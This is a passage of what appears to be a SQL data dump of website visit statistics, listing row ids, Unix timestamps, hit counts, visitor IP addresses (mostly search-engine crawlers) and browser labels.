'66.249.65.198','chrome'),(386466,1550250717,3,3,0,0,'66.249.65.194','chrome'),(386467,1550250997,1,1,0,0,'141.8.142.103','other'),(386468,1550251001,2,2,0,0,'5.45.207.79','other'),(386469,1550251192,1,1,0,0,'178.154.244.11','other'),(386470,1550251276,2,2,0,0,'40.77.167.127','other'),(386471,1550251675,1,1,0,0,'95.134.96.28','other'),(386472,1550251716,1,1,0,0,'40.77.167.100','other'),(386473,1550251834,1,1,0,0,'216.244.66.241','other'),(386474,1550252110,1,1,0,0,'141.8.142.103','other'),(386475,1550252213,1,1,0,0,'46.229.168.137','other'),(386476,1550252313,2,2,0,0,'40.77.167.158','other'),(386477,1550252385,1,1,0,0,'66.249.65.198','chrome'),(386478,1550252445,1,1,0,0,'91.196.178.77','firefox'),(386479,1550252490,1,1,0,0,'95.163.255.178','other'),(386480,1550252587,1,1,0,0,'66.249.65.196','chrome'),(386481,1550252842,3,3,0,0,'216.244.66.241','other'),(386482,1550252867,1,1,0,0,'94.179.208.80','chrome'),(386483,1550253055,1,1,0,0,'62.205.134.182','msie'),(386484,1550253179,1,1,0,0,'95.163.255.98','other'),(386485,1550253237,1,1,0,0,'40.77.167.127','other'),(386486,1550253631,1,1,0,0,'46.133.112.226','chrome'),(386487,1550253657,1,1,0,0,'40.77.167.100','other'),(386488,1550253720,1,1,0,0,'5.45.207.19','other'),(386489,1550254003,1,1,0,0,'141.8.142.103','other'),(386490,1550254413,1,1,0,0,'95.132.36.29','chrome'),(386491,1550254531,1,1,0,0,'46.229.168.129','other'),(386492,1550254944,1,1,0,0,'95.163.255.168','other'),(386493,1550254999,1,1,0,0,'91.196.178.134','chrome'),(386494,1550255106,1,1,0,0,'46.229.168.136','other'),(386495,1550255281,1,1,0,0,'109.201.154.198','other'),(386496,1550255383,4,4,0,0,'216.244.66.241','other'),(386497,1550255763,2,2,0,0,'66.249.65.198','chrome'),(386498,1550255880,1,1,0,0,'66.249.65.196','chrome'),(386499,1550256052,1,1,0,0,'91.196.178.77','firefox'),(386500,1550256094,1,1,0,0,'46.229.168.144','other'),(386501,1550256566,2,2,0,0,'40.77.167.100','other'),(386502,1550256916,1,1,0,0,'66.249.73.1','chrome'),(386503,1550257117,4,4,0,0,'216.244.66.241','other'),(386504,1550257121,1,1,0,0,'66.249.65.196','chrome'),(386505,1550258107,1,1,0,0,'8.29.198.26','other'),(386506,1550258166,1,1,0,0,'178.92.251.114','chrome'),(386507,1550258172,1,1,0,0,'95.163.255.164','other'),(386508,1550258241,2,2,0,0,'216.244.66.241','other'),(386509,1550258285,1,1,0,0,'66.249.65.196','chrome'),(386510,1550258287,1,1,0,0,'31.13.127.14','other'),(386511,1550258598,1,1,0,0,'46.211.41.206','other'),(386512,1550258947,1,1,0,0,'66.249.73.31','chrome'),(386513,1550259128,1,1,0,0,'91.196.178.37','chrome'),(386514,1550259454,1,1,0,0,'157.55.39.252','other'),(386515,1550259587,1,1,0,0,'8.29.198.27','other'),(386516,1550259619,1,1,0,0,'46.133.112.226','chrome'),(386517,1550259627,1,1,0,0,'40.77.167.10','other'),(386518,1550259875,1,1,0,0,'91.196.178.134','chrome'),(386519,1550259902,1,1,0,0,'180.76.15.14','other'),(386520,1550259975,2,2,0,0,'66.249.65.196','chrome'),(386521,1550260453,2,2,0,0,'216.244.66.241','other'),(386522,1550260661,1,1,0,0,'40.77.167.100','other'),(386523,1550260696,1,1,0,0,'46.229.168.141','other'),(386524,1550260788,1,1,0,0,'95.163.255.94','other'),(386525,1550260976,1,1,0,0,'180.76.15.140','other'),(386526,1550261150,1,1,0,0,'46.229.168.137','other'),(386527,1550261459,1,1,0,0,'46.229.168.151','other'),(386528,1550261613,1,1,0,0,'207.46.13.224','other'),(386529,1550261844,5,5,0,0,'5.45.207.19','other'),(386530,1550261893,1,1,0,0,'95.108.213.4','other'),(386531,1550261902,1,1,0,0,'180.76.15.139','other'),(386532,1550262248,1,1,0,0,'66.249.65.194','chrome'),(386533,1550262414,1,1,0,0,'46.229.168.149','other'),(386534,1550262445,1,1,0,0,'216.244.66.241','other'),(386535,1550262850,1,1,0,0,'66.249.73.1','chrome'),(386536,1550262867,1,1,0,0,'91.121.178.215','msie'),(386537,1550263173,1,1,0,0,'207.46.13.76','other'),(386538,1550263240,1,1,0,0,'66.249.73.30','chrome'),(386539,1550263301,1,1,0,0,'91.196.178.78','chrome'),(386540,1550263392,1,1,0,0,'66.249.65.194','chrome'),(386541,1550263441,1,1,0,0,'91.196.178.186','chrome'),(386542,1550263520,4,4,0,0,'216.244.66.241','other'),(386543,1550263551,2,2,0,0,'5.45.207.79','other'),(386544,1550263596,1,1,0,0,'207.46.13.136','other'),(386545,1550263956,1,1,0,0,'95.163.255.191','other'),(386546,1550264334,1,1,0,0,'46.229.168.146','other'),(386547,1550264520,2,2,0,0,'66.249.65.194','chrome'),(386548,1550264524,1,1,0,0,'95.163.255.95','other'),(386549,1550264974,2,2,0,0,'66.249.65.196','chrome'),(386550,1550264975,1,1,0,0,'46.229.168.152','other'),(386551,1550265389,1,1,0,0,'95.163.255.169','other'),(386552,1550265633,1,1,0,0,'207.46.13.229','other'),(386553,1550265834,1,1,0,0,'95.163.255.192','other'),(386554,1550266023,1,1,0,0,'46.229.168.141','other'),(386555,1550266029,1,1,0,0,'207.46.13.76','other'),(386556,1550266099,2,2,0,0,'216.244.66.241','other'),(386557,1550266256,1,1,0,0,'46.211.114.74','chrome'),(386558,1550266648,1,1,0,0,'46.229.168.139','other'),(386559,1550266805,1,1,0,0,'66.249.65.194','chrome'),(386560,1550266911,1,1,0,0,'95.163.255.155','other'),(386561,1550267209,1,1,0,0,'46.229.168.134','other'),(386562,1550267266,1,1,0,0,'46.229.168.147','other'),(386563,1550267362,1,1,0,0,'91.196.177.151','chrome'),(386564,1550267770,1,1,0,0,'66.249.65.216','chrome'),(386565,1550268092,2,2,0,0,'66.249.73.30','chrome'),(386566,1550268583,1,1,0,0,'173.252.127.12','other'),(386567,1550268945,1,1,0,0,'8.29.198.25','other'),(386568,1550269066,1,1,0,0,'66.249.65.196','chrome'),(386569,1550269115,7,7,0,0,'216.244.66.241','other'),(386570,1550269286,1,1,0,0,'46.229.168.150','other'),(386571,1550269711,1,1,0,0,'66.249.73.1','chrome'),(386572,1550269895,1,1,0,0,'66.249.73.31','chrome'),(386573,1550270027,1,1,0,0,'157.55.39.90','other'),(386574,1550270096,1,1,0,0,'207.46.13.76','other'),(386575,1550270116,3,3,0,0,'66.249.65.198','chrome'),(386576,1550270423,1,1,0,0,'8.29.198.25','other'),(386577,1550271156,1,1,0,0,'95.163.255.94','other'),(386578,1550271342,1,1,0,0,'66.249.65.196','chrome'),(386579,1550271830,2,2,0,0,'66.249.65.218','chrome'),(386580,1550271851,1,1,0,0,'216.244.66.241','other'),(386581,1550272100,1,1,0,0,'46.229.168.150','other'),(386582,1550272428,1,1,0,0,'95.163.255.179','other'),(386583,1550272589,1,1,0,0,'95.163.255.180','other'),(386584,1550272813,1,1,0,0,'46.229.168.152','other'),(386585,1550273614,1,1,0,0,'66.249.65.194','chrome'),(386586,1550273888,1,1,0,0,'46.229.168.143','other'),(386587,1550274052,1,1,0,0,'216.244.66.241','other'),(386588,1550274092,1,1,0,0,'40.77.167.29','other'),(386589,1550275185,1,1,0,0,'66.249.73.1','chrome'),(386590,1550275471,1,1,0,0,'207.46.13.108','other'),(386591,1550275889,1,1,0,0,'66.249.65.196','chrome'),(386592,1550275971,1,1,0,0,'216.244.66.241','other'),(386593,1550276810,1,1,0,0,'66.249.65.198','chrome'),(386594,1550277295,4,4,0,0,'216.244.66.241','other'),(386595,1550277297,2,2,0,0,'66.249.73.1','chrome'),(386596,1550277416,1,1,0,0,'46.229.168.150','other'),(386597,1550278212,1,1,0,0,'66.249.65.198','chrome'),(386598,1550278249,1,1,0,0,'95.163.255.169','other'),(386599,1550278384,1,1,0,0,'95.163.255.99','other'),(386600,1550278498,1,1,0,0,'95.163.255.182','other'),(386601,1550279684,1,1,0,0,'207.180.242.58','other'),(386602,1550279786,1,1,0,0,'8.29.198.25','other'),(386603,1550279829,1,1,0,0,'40.77.167.83','other'),(386604,1550280135,1,1,0,0,'216.244.66.241','other'),(386605,1550280438,1,1,0,0,'66.249.65.196','chrome'),(386606,1550280447,1,1,0,0,'157.55.39.254','other'),(386607,1550280459,1,1,0,0,'46.229.168.143','other'),(386608,1550281287,1,1,0,0,'8.29.198.25','other'),(386609,1550282282,1,1,0,0,'66.249.65.194','chrome'),(386610,1550282357,1,1,0,0,'157.55.39.59','other'),(386611,1550282712,1,1,0,0,'66.249.65.196','chrome'),(386612,1550282781,1,1,0,0,'95.163.255.98','other'),(386613,1550282917,1,1,0,0,'46.229.168.142','other'),(386614,1550283141,1,1,0,0,'157.55.39.254','other'),(386615,1550283348,1,1,0,0,'46.229.168.132','other'),(386616,1550283871,1,1,0,0,'5.188.210.53','chrome'),(386617,1550283949,1,1,0,0,'46.211.71.231','chrome'),(386618,1550284228,1,1,0,0,'40.77.167.174','other'),(386619,1550285096,1,1,0,0,'46.229.168.135','other'),(386620,1550285328,1,1,0,0,'216.244.66.241','other'),(386621,1550285572,2,2,0,0,'54.202.245.167','chrome'),(386622,1550285621,1,1,0,0,'95.163.255.180','other'),(386623,1550285956,1,1,0,0,'66.249.65.194','chrome'),(386624,1550287153,2,2,0,0,'216.244.66.241','other'),(386625,1550287255,2,2,0,0,'66.249.65.196','chrome'),(386626,1550287521,2,2,0,0,'40.77.167.83','other'),(386627,1550288062,1,1,0,0,'157.55.39.254','other'),(386628,1550288125,1,1,0,0,'157.55.39.59','other'),(386629,1550288241,1,1,0,0,'209.17.97.66','other'),(386630,1550288515,1,1,0,0,'46.229.168.132','other'),(386631,1550288586,1,1,0,0,'95.163.255.153','other'),(386632,1550289266,1,1,0,0,'95.163.255.159','other'),(386633,1550289528,1,1,0,0,'66.249.65.196','chrome'),(386634,1550289797,2,2,0,0,'95.211.186.147','chrome'),(386635,1550290627,1,1,0,0,'8.29.198.25','other'),(386636,1550290681,2,2,0,0,'216.244.66.241','other'),(386637,1550290751,1,1,0,0,'91.196.178.57','chrome'),(386638,1550291656,1,1,0,0,'66.249.65.194','chrome'),(386639,1550291801,2,2,0,0,'66.249.65.196','chrome'),(386640,1550292004,1,1,0,0,'66.249.65.198','chrome'),(386641,1550292135,1,1,0,0,'8.29.198.25','other'),(386642,1550292764,1,1,0,0,'31.202.122.198','firefox'),(386643,1550293240,5,5,0,0,'216.244.66.241','other'),(386644,1550293278,1,1,0,0,'46.229.168.137','other'),(386645,1550293686,18,18,0,0,'3.80.60.248','other'),(386646,1550294167,1,1,0,0,'66.249.73.1','chrome'),(386647,1550294245,1,1,0,0,'157.55.39.107','other'),(386648,1550294434,1,1,0,0,'95.163.255.172','other'),(386649,1550294664,1,1,0,0,'40.77.167.94','other'),(386650,1550294686,1,1,0,0,'66.249.65.196','chrome'),(386651,1550294748,10,10,0,0,'3.80.60.248','other'),(386652,1550295470,1,1,0,0,'95.163.255.189','other'),(386653,1550295573,1,1,0,0,'66.249.73.24','chrome'),(386654,1550295582,1,1,0,0,'95.163.255.195','other'),(386655,1550295840,16,16,0,0,'3.80.60.248','other'),(386656,1550295863,1,1,0,0,'95.163.255.164','other'),(386657,1550296049,3,3,0,0,'216.244.66.241','other'),(386658,1550296629,1,1,0,0,'46.229.168.151','other'),(386659,1550296748,1,1,0,0,'157.55.39.107','other'),(386660,1550296869,19,19,0,0,'3.80.60.248','other'),(386661,1550297095,1,1,0,0,'46.229.168.144','other'),(386662,1550297177,2,2,0,0,'66.249.73.24','chrome'),(386663,1550297289,1,1,0,0,'51.15.56.18','other'),(386664,1550297507,1,1,0,0,'92.113.189.110','chrome'),(386665,1550297592,1,1,0,0,'46.229.168.147','other'),(386666,1550297736,1,1,0,0,'157.55.39.200','other'),(386667,1550297890,7,7,0,0,'3.80.60.248','other'),(386668,1550298630,3,3,0,0,'216.244.66.241','other'),(386669,1550298841,5,5,0,0,'3.80.60.248','other'),(386670,1550298914,1,1,0,0,'66.249.65.198','chrome'),(386671,1550299082,1,1,0,0,'46.229.168.138','other'),(386672,1550299223,1,1,0,0,'91.196.178.55','chrome'),(386673,1550300325,1,1,0,0,'157.55.39.200','other'),(386674,1550300644,1,1,0,0,'40.77.167.94','other'),(386675,1550300813,2,2,0,0,'66.249.65.194','chrome'),(386676,1550300868,1,1,0,0,'180.76.15.144','other'),(386677,1550301366,5,5,0,0,'216.244.66.241','other'),(386678,1550301460,1,1,0,0,'8.29.198.26','other'),(386679,1550301544,1,1,0,0,'91.196.121.15','chrome'),(386680,1550302016,1,1,0,0,'46.229.168.151','other'),(386681,1550302224,1,1,0,0,'66.249.65.196','chrome'),(386682,1550302414,2,2,0,0,'66.249.65.198','chrome'),(386683,1550302533,1,1,0,0,'157.55.39.107','other'),(386684,1550302792,1,1,0,0,'157.55.39.200','other'),(386685,1550302883,1,1,0,0,'95.163.255.97','other'),(386686,1550302985,1,1,0,0,'8.29.198.27','other'),(386687,1550303212,1,1,0,0,'207.46.13.59','other'),(386688,1550303417,1,1,0,0,'66.249.65.198','chrome'),(386689,1550303801,1,1,0,0,'91.196.178.135','chrome'),(386690,1550304108,2,2,0,0,'216.244.66.241','other'),(386691,1550304729,1,1,0,0,'46.229.168.144','other'),(386692,1550304878,1,1,0,0,'46.229.168.150','other'),(386693,1550305236,2,2,0,0,'157.55.39.51','other'),(386694,1550305414,1,1,0,0,'95.163.255.96','other'),(386695,1550305494,1,1,0,0,'66.249.65.198','chrome'),(386696,1550305833,1,1,0,0,'130.180.208.45','chrome'),(386697,1550306039,1,1,0,0,'66.249.65.196','chrome'),(386698,1550306070,1,1,0,0,'103.216.58.249','firefox'),(386699,1550306506,1,1,0,0,'80.252.154.233','firefox'),(386700,1550306987,1,1,0,0,'95.163.255.155','other'),(386701,1550307015,1,1,0,0,'52.53.201.78','chrome'),(386702,1550307171,1,1,0,0,'95.163.255.161','other'),(386703,1550307293,1,1,0,0,'46.229.168.149','other'),(386704,1550307536,1,1,0,0,'216.244.66.241','other'),(386705,1550307544,2,2,0,0,'157.55.39.51','other'),(386706,1550308101,1,1,0,0,'66.249.73.31','chrome'),(386707,1550308580,1,1,0,0,'180.76.15.139','other'),(386708,1550308771,1,1,0,0,'66.249.73.1','chrome'),(386709,1550309494,1,1,0,0,'157.55.39.51','other'),(386710,1550309511,2,2,0,0,'66.249.65.194','chrome'),(386711,1550309957,2,2,0,0,'216.244.66.241','other'),(386712,1550310013,1,1,0,0,'66.249.65.198','chrome'),(386713,1550310684,1,1,0,0,'157.55.39.90','other'),(386714,1550310815,1,1,0,0,'40.77.167.125','other'),(386715,1550310878,1,1,0,0,'157.55.39.51','other'),(386716,1550311025,1,1,0,0,'46.211.27.241','chrome'),(386717,1550311163,1,1,0,0,'66.249.65.198','chrome'),(386718,1550311195,1,1,0,0,'46.229.168.153','other'),(386719,1550311295,2,2,0,0,'66.249.73.30','chrome'),(386720,1550311643,1,1,0,0,'66.249.65.196','chrome'),(386721,1550312319,1,1,0,0,'8.29.198.26','other'),(386722,1550312522,1,1,0,0,'66.249.73.30','chrome'),(386723,1550312658,1,1,0,0,'95.163.255.197','other'),(386724,1550312821,2,2,0,0,'216.244.66.241','other'),(386725,1550313123,1,1,0,0,'66.249.73.1','chrome'),(386726,1550313553,1,1,0,0,'66.249.65.196','chrome'),(386727,1550313661,1,1,0,0,'66.249.65.194','chrome'),(386728,1550313824,1,1,0,0,'8.29.198.27','other'),(386729,1550314593,1,1,0,0,'46.229.168.153','other'),(386730,1550314604,1,1,0,0,'5.45.207.79','other'),(386731,1550314841,1,1,0,0,'40.77.167.44','other'),(386732,1550315016,1,1,0,0,'46.211.37.147','chrome'),(386733,1550315154,1,1,0,0,'66.249.65.196','chrome'),(386734,1550315401,1,1,0,0,'178.133.20.118','chrome'),(386735,1550315420,1,1,0,0,'66.249.65.198','chrome'),(386736,1550315554,1,1,0,0,'13.66.139.0','other'),(386737,1550317267,1,1,0,0,'207.46.13.76','other'),(386738,1550317342,1,1,0,0,'66.249.65.198','chrome'),(386739,1550317372,1,1,0,0,'95.163.255.160','other'),(386740,1550317507,1,1,0,0,'95.163.255.151','other'),(386741,1550317517,1,1,0,0,'91.196.177.163','chrome'),(386742,1550318019,1,1,0,0,'95.163.255.181','other'),(386743,1550318273,1,1,0,0,'216.244.66.241','other'),(386744,1550318281,2,2,0,0,'46.229.168.132','other'),(386745,1550319115,1,1,0,0,'157.55.39.216','other'),(386746,1550319214,1,1,0,0,'178.154.244.11','other'),(386747,1550319985,1,1,0,0,'180.76.15.148','other'),(386748,1550320356,1,1,0,0,'46.229.168.149','other'),(386749,1550320514,1,1,0,0,'66.249.73.1','chrome'),(386750,1550320581,2,2,0,0,'66.249.65.196','chrome'),(386751,1550320623,1,1,0,0,'141.8.142.103','other'),(386752,1550320809,1,1,0,0,'66.249.65.194','chrome'),(386753,1550321299,1,1,0,0,'46.229.168.147','other'),(386754,1550321607,1,0,1,0,'66.249.65.198',''),(386755,1550321662,1,1,0,0,'141.8.142.103','other'),(386756,1550322632,1,1,0,0,'207.46.13.126','other'),(386757,1550323160,1,1,0,0,'8.29.198.26','other'),(386758,1550323334,1,1,0,0,'95.163.255.186','other'),(386759,1550323586,1,1,0,0,'91.196.178.87','chrome'),(386760,1550323694,1,1,0,0,'95.163.255.184','other'),(386761,1550323816,1,1,0,0,'66.249.65.196','chrome'),(386762,1550324016,1,1,0,0,'46.229.168.137','other'),(386763,1550324149,1,1,0,0,'66.249.73.1','chrome'),(386764,1550324404,1,1,0,0,'46.229.168.134','other'),(386765,1550324632,1,1,0,0,'46.229.168.140','other'),(386766,1550324662,1,1,0,0,'8.29.198.26','other'),(386767,1550324698,1,1,0,0,'207.46.13.126','other'),(386768,1550324904,1,1,0,0,'95.163.255.188','other'),(386769,1550325439,1,1,0,0,'46.229.168.130','other'),(386770,1550325546,1,1,0,0,'91.196.178.174','chrome'),(386771,1550326187,1,1,0,0,'207.46.13.93','other'),(386772,1550326411,1,1,0,0,'66.249.73.1','chrome'),(386773,1550326522,1,1,0,0,'66.249.65.194','chrome'),(386774,1550326805,2,2,0,0,'207.46.13.237','other'),(386775,1550327164,1,1,0,0,'46.133.15.9','chrome'),(386776,1550328171,1,1,0,0,'66.249.65.198','chrome'),(386777,1550328189,1,1,0,0,'46.229.168.153','other'),(386778,1550328559,1,1,0,0,'216.244.66.241','other'),(386779,1550328697,1,1,0,0,'18.184.82.216','chrome'),(386780,1550329012,1,1,0,0,'95.132.2.94','chrome'),(386781,1550329398,1,1,0,0,'95.163.255.166','other'),(386782,1550329662,1,1,0,0,'46.229.168.135','other'),(386783,1550330175,2,2,0,0,'66.249.65.198','chrome'),(386784,1550331343,3,3,0,0,'216.244.66.241','other'),(386785,1550331418,1,1,0,0,'207.46.13.126','other'),(386786,1550331494,1,1,0,0,'91.196.178.61','chrome'),(386787,1550331599,1,1,0,0,'66.249.65.196','chrome'),(386788,1550332228,2,2,0,0,'66.249.65.194','chrome'),(386789,1550332309,1,1,0,0,'46.229.168.148','other'),(386790,1550332717,1,1,0,0,'66.249.65.196','chrome'),(386791,1550333835,3,3,0,0,'216.244.66.241','other'),(386792,1550333999,1,1,0,0,'8.29.198.27','other'),(386793,1550334132,1,1,0,0,'95.163.255.97','other'),(386794,1550334478,1,1,0,0,'95.163.255.190','other'),(386795,1550335072,2,2,0,0,'66.249.65.198','chrome'),(386796,1550335145,1,1,0,0,'157.55.39.169','other'),(386797,1550335167,1,1,0,0,'66.249.65.196','chrome'),(386798,1550335239,1,1,0,0,'95.163.255.168','other'),(386799,1550335522,1,1,0,0,'8.29.198.27','other'),(386800,1550336427,4,4,0,0,'216.244.66.241','other'),(386801,1550336751,1,1,0,0,'91.196.178.174','chrome'),(386802,1550336896,1,1,0,0,'66.249.65.196','chrome'),(386803,1550336963,1,1,0,0,'66.249.73.1','chrome'),(386804,1550337265,1,1,0,0,'66.249.65.194','chrome'),(386805,1550337492,1,1,0,0,'207.46.13.93','other'),(386806,1550337871,1,1,0,0,'46.211.27.238','chrome'),(386807,1550338066,1,1,0,0,'46.229.168.141','other'),(386808,1550338422,1,1,0,0,'207.46.13.93','other'),(386809,1550338892,1,1,0,0,'66.249.65.194','chrome'),(386810,1550339022,1,1,0,0,'207.46.13.48','other'),(386811,1550339253,1,1,0,0,'207.46.13.59','other'),(386812,1550339538,1,1,0,0,'66.249.65.198','chrome'),(386813,1550339883,1,1,0,0,'216.244.66.241','other'),(386814,1550339981,1,1,0,0,'207.46.13.93','other'),(386815,1550340261,1,1,0,0,'207.46.13.48','other'),(386816,1550340265,1,1,0,0,'46.229.168.135','other'),(386817,1550340354,1,1,0,0,'66.249.73.1','chrome'),(386818,1550340656,2,2,0,0,'207.46.13.38','other'),(386819,1550341031,1,1,0,0,'46.229.168.151','other'),(386820,1550341066,1,1,0,0,'95.132.2.94','chrome'),(386821,1550341822,2,2,0,0,'66.249.65.198','chrome'),(386822,1550341940,1,1,0,0,'46.211.148.129','chrome'),(386823,1550342039,1,1,0,0,'180.76.15.34','other'),(386824,1550342741,1,1,0,0,'207.46.13.48','other'),(386825,1550343461,1,1,0,0,'46.229.168.140','other'),(386826,1550343540,1,1,0,0,'157.55.39.99','other'),(386827,1550343961,1,1,0,0,'46.211.148.31','other'),(386828,1550344039,1,1,0,0,'180.76.15.153','other'),(386829,1550344082,2,2,0,0,'66.249.66.156','chrome'),(386830,1550344611,1,1,0,0,'66.249.66.154','chrome'),(386831,1550344757,1,1,0,0,'46.229.168.132','other'),(386832,1550344800,1,1,0,0,'157.55.39.99','other'),(386833,1550344838,1,1,0,0,'8.29.198.27','other'),(386834,1550345843,1,1,0,0,'91.209.11.236','other'),(386835,1550346356,1,1,0,0,'66.249.66.156','chrome'),(386836,1550346367,1,1,0,0,'8.29.198.26','other'),(386837,1550346370,1,1,0,0,'157.55.39.99','other'),(386838,1550347612,1,1,0,0,'178.154.244.11','other'),(386839,1550347638,1,1,0,0,'95.163.255.190','other'),(386840,1550347756,1,1,0,0,'46.229.168.137','other'),(386841,1550347772,1,1,0,0,'66.249.66.156','chrome'),(386842,1550347792,1,1,0,0,'216.244.66.241','other'),(386843,1550347855,1,1,0,0,'91.196.178.54','chrome'),(386844,1550348175,1,1,0,0,'91.196.178.89','chrome'),(386845,1550348305,1,1,0,0,'207.46.13.48','other'),(386846,1550348631,1,1,0,0,'66.249.66.152','chrome'),(386847,1550349307,1,1,0,0,'46.229.168.132','other'),(386848,1550349554,1,1,0,0,'46.133.129.169','chrome'),(386849,1550349646,1,1,0,0,'46.229.168.145','other'),(386850,1550350083,1,1,0,0,'216.244.66.241','other'),(386851,1550350220,1,1,0,0,'66.249.66.44','chrome'),(386852,1550350227,2,2,0,0,'66.249.66.42','chrome'),(386853,1550350688,1,1,0,0,'207.46.13.137','other'),(386854,1550350902,1,1,0,0,'66.249.66.154','chrome'),(386855,1550351361,1,1,0,0,'66.249.66.156','chrome'),(386856,1550351508,2,2,0,0,'66.249.66.152','chrome'),(386857,1550351938,2,2,0,0,'216.244.66.241','other'),(386858,1550351978,1,1,0,0,'46.229.168.134','other'),(386859,1550352148,1,1,0,0,'207.46.13.137','other'),(386860,1550352582,1,1,0,0,'46.229.168.132','other'),(386861,1550353077,1,1,0,0,'216.244.66.241','other'),(386862,1550353813,1,1,0,0,'66.249.66.154','chrome'),(386863,1550353825,1,1,0,0,'66.249.66.152','chrome'),(386864,1550354426,1,1,0,0,'46.229.168.137','other'),(386865,1550354854,1,1,0,0,'66.249.66.40','chrome'),(386866,1550355282,1,1,0,0,'66.249.66.156','chrome'),(386867,1550355480,2,2,0,0,'216.244.66.241','other'),(386868,1550355502,14,14,0,0,'69.30.198.186','other'),(386869,1550355576,14,14,0,0,'167.86.73.200','other'),(386870,1550355689,1,1,0,0,'8.29.198.25','other'),(386871,1550355701,1,1,0,0,'66.249.66.152','chrome'),(386872,1550356232,1,1,0,0,'207.46.13.137','other'),(386873,1550356867,1,1,0,0,'40.77.167.88','other'),(386874,1550356944,1,1,0,0,'66.249.66.152','chrome'),(386875,1550357070,1,1,0,0,'66.249.66.154','chrome'),(386876,1550357211,1,1,0,0,'8.29.198.25','other'),(386877,1550357511,1,1,0,0,'46.229.168.139','other'),(386878,1550358491,4,4,0,0,'216.244.66.241','other'),(386879,1550358647,1,1,0,0,'46.229.168.153','other'),(386880,1550358936,1,1,0,0,'178.154.244.11','other'),(386881,1550358999,1,1,0,0,'46.229.168.151','other'),(386882,1550359220,1,1,0,0,'46.229.168.135','other'),(386883,1550359310,1,1,0,0,'46.229.168.140','other'),(386884,1550359522,1,1,0,0,'207.46.13.48','other'),(386885,1550359854,1,1,0,0,'66.249.66.152','chrome'),(386886,1550360003,2,2,0,0,'40.77.167.217','other'),(386887,1550360130,1,1,0,0,'194.113.106.125','chrome'),(386888,1550360432,1,1,0,0,'66.249.66.154','chrome'),(386889,1550360475,1,1,0,0,'66.249.66.156','chrome'),(386890,1550360615,1,1,0,0,'46.229.168.141','other'),(386891,1550362230,1,1,0,0,'66.249.66.40','chrome'),(386892,1550362370,1,1,0,0,'66.249.66.42','chrome'),(386893,1550362400,1,1,0,0,'95.163.255.95','other'),(386894,1550362477,1,1,0,0,'207.46.13.137','other'),(386895,1550362607,1,1,0,0,'66.249.66.156','chrome'),(386896,1550363113,2,2,0,0,'66.249.66.154','chrome'),(386897,1550363161,2,2,0,0,'46.229.168.148','other'),(386898,1550364139,1,1,0,0,'66.249.66.42','chrome'),(386899,1550364541,1,1,0,0,'66.249.66.152','chrome'),(386900,1550364931,1,1,0,0,'46.229.168.150','other'),(386901,1550365675,1,1,0,0,'207.46.13.66','other'),(386902,1550365681,1,1,0,0,'40.77.167.175','other'),(386903,1550366522,1,1,0,0,'8.29.198.26','other'),(386904,1550366529,1,1,0,0,'40.77.167.217','other'),(386905,1550367618,1,1,0,0,'66.249.66.152','chrome'),(386906,1550368056,1,1,0,0,'8.29.198.25','other'),(386907,1550369415,1,1,0,0,'66.249.66.156','chrome'),(386908,1550369446,4,4,0,0,'216.244.66.241','other'),(386909,1550369877,1,1,0,0,'46.229.168.148','other'),(386910,1550370061,1,1,0,0,'95.163.255.186','other'),(386911,1550370302,2,2,0,0,'54.188.58.82','chrome'),(386912,1550370592,1,1,0,0,'95.163.255.154','other'),(386913,1550370667,2,2,0,0,'40.77.167.175','other'),(386914,1550370710,3,3,0,0,'5.9.152.73','other'),(386915,1550371059,1,1,0,0,'46.229.168.132','other'),(386916,1550371436,1,1,0,0,'176.14.249.243','firefox'),(386917,1550372131,1,1,0,0,'46.229.168.153','other'),(386918,1550372710,1,1,0,0,'66.249.66.156','chrome'),(386919,1550372979,1,1,0,0,'46.229.168.152','other'),(386920,1550373165,1,1,0,0,'46.229.168.149','other'),(386921,1550373374,1,1,0,0,'46.229.168.142','other'),(386922,1550373705,1,1,0,0,'46.229.168.136','other'),(386923,1550374090,1,1,0,0,'157.55.39.165','other'),(386924,1550374190,1,1,0,0,'46.229.168.146','other'),(386925,1550374450,1,1,0,0,'46.229.168.137','other'),(386926,1550374604,2,2,0,0,'66.249.66.156','chrome'),(386927,1550376220,1,1,0,0,'66.249.66.154','chrome'),(386928,1550376485,1,1,0,0,'46.229.168.144','other'),(386929,1550377187,1,1,0,0,'40.77.167.32','other'),(386930,1550377356,1,1,0,0,'8.29.198.27','other'),(386931,1550377501,2,2,0,0,'216.244.66.241','other'),(386932,1550377512,1,1,0,0,'66.249.66.152','chrome'),(386933,1550377594,1,1,0,0,'46.229.168.132','other'),(386934,1550378394,2,2,0,0,'66.249.66.154','chrome'),(386935,1550378828,1,1,0,0,'54.36.148.139','other'),(386936,1550378899,1,1,0,0,'8.29.198.27','other'),(386937,1550378931,1,1,0,0,'54.36.148.210','other'),(386938,1550379032,1,1,0,0,'54.36.148.95','other'),(386939,1550379359,1,1,0,0,'54.36.148.142','other'),(386940,1550379463,2,2,0,0,'207.46.13.15','other'),(386941,1550379471,1,1,0,0,'54.36.149.46','other'),(386942,1550379613,1,1,0,0,'66.249.66.152','chrome'),(386943,1550379666,1,1,0,0,'46.229.168.152','other'),(386944,1550380170,1,1,0,0,'66.249.66.154','chrome'),(386945,1550380778,1,1,0,0,'54.36.148.245','other'),(386946,1550380779,1,1,0,0,'54.36.148.144','other'),(386947,1550380933,1,1,0,0,'66.249.66.44','chrome'),(386949,1550381069,1,1,0,0,'54.36.148.95','other'),(386950,1550381180,1,1,0,0,'46.229.168.137','other'),(386951,1550381490,1,1,0,0,'46.229.168.145','other'),(386952,1550381530,1,1,0,0,'54.36.148.130','other'),(386953,1550381709,1,1,0,0,'54.36.149.43','other'),(386954,1550381725,1,1,0,0,'46.229.168.142','other'),(386955,1550382084,1,1,0,0,'54.36.148.109','other'),(386956,1550382172,1,1,0,0,'54.36.148.241','other'),(386957,1550382433,1,1,0,0,'54.36.148.39','other'),(386958,1550382467,1,1,0,0,'54.36.148.243','other'),(386959,1550382649,1,1,0,0,'54.36.148.100','other'),(386960,1550382883,1,1,0,0,'46.229.168.150','other'),(386961,1550382921,1,1,0,0,'54.36.148.108','other'),(386962,1550383001,1,1,0,0,'54.36.149.3','other'),(386963,1550383131,1,1,0,0,'66.249.66.42','chrome'),(386964,1550383583,1,1,0,0,'66.249.66.156','chrome'),(386965,1550383605,1,1,0,0,'66.249.66.152','chrome'),(386966,1550383756,1,1,0,0,'54.36.148.114','other'),(386967,1550383786,1,1,0,0,'207.46.13.15','other'),(386968,1550383892,1,1,0,0,'185.220.102.8','other'),(386969,1550384359,1,1,0,0,'54.36.148.141','other'),(386970,1550384414,1,1,0,0,'66.249.66.154','chrome'),(386971,1550384678,1,1,0,0,'66.2